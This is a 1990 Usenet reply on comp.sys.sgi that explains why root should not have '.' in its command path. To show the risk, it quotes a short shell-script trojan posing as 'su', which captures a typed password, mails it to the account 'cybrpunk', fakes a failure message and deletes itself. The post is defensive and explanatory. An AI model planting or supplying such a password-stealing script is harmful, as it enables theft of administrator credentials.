Path: utzoo!utgpu!watserv1!watmath!att!tut.cis.ohio-state.edu!cs.utexas.edu!usc!samsung!rex!ames!dftsrv!iris613!merritt
From: merritt@iris613.gsfc.nasa.gov (John H Merritt)
Newsgroups: comp.sys.sgi
Subject: Re: . in $path
Message-ID: <1630@dftsrv.gsfc.nasa.gov>
Date: 12 Apr 90 18:07:48 GMT
References: <283:doelz@urz.unibas.ch>
Sender: news@dftsrv.gsfc.nasa.gov
Reply-To: merritt@iris613.UUCP (John H Merritt)
Organization: Goddard Space Flight Center Climate and Radiation Branch
Lines: 35

In article <283:doelz@urz.unibas.ch> doelz@urz.unibas.ch (Reinhard Doelz) writes:
>
>
>The *root* may not use it, otherwise it's fine. Imagine you're su'ing around
>and some weird guy aliased ls to rm.
                    ^^^^^^^  <-- he means, has a command or program named ...


More concretely it prevents some one gaining root capabilities through
a trojan horse.  Consider the following program, from UNIX Today April 2, 1990.

Chump=$1
stty -echo
echo "Password:\c"
read ChumpsPwd
echo ""
stty echo
echo $Chump\'s passwd is $ChumpsPwd \
 | mail cybrpunk
sleep 1
echo "su:Sorry"
rm su

This program is placed in every public writable directory and
eventually someone will execute it; it reports failure the first time and
the user thinks he typed the wrong password and never knows he just 
gave the root password away.

Another popular trojan horse is 'ls'.

If you must have '.' in the path, it should be last.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
John H. Merritt                   #  Yesterday I knew nothing,
Applied Research Corporation      #  Today I know that.
merritt@iris613.gsfc.nasa.gov     #